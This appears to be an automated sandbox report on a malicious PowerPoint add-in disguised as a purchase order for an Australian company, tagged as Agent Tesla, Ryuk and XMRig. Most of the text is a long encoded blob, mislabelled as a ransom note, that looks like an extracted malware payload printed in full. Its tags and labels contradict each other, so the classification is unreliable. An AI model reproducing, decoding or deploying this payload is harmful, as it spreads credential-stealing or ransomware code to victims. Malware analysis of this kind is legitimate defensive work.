agenttesla | 0e9423c6b3d555a01513b11f32ab37696a240a469b496b64c01069c40e636447

Target

PO - CE AUSTRALIA PTY LTD.ppam
Size

10KB
MD5

7c629522213c57c3b3d66ee8e6c13fed
SHA1

352b55636c67a5cd27a998888df0a137ef5433d8
SHA256

a2e98dd3fa146e70b06e95d0cbbf9a831a04e94572a229e6d554372cb6943c04
SHA512

385fbe8c518741e20daf5a62ac6e772d9d7b813e53e2a02b75f32287711c5ca316e162d24b04f48c1a90d799314f330fdc564a3494a27fa3811c1eb87571563b

Score

10^/10

agenttesla ryuk xmrig keylogger miner persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G2KS51P3\5940e4_39e7aca5ca73408f9ea38510ed3aa48e[1].txt

Family

ryuk

Ransom Note

=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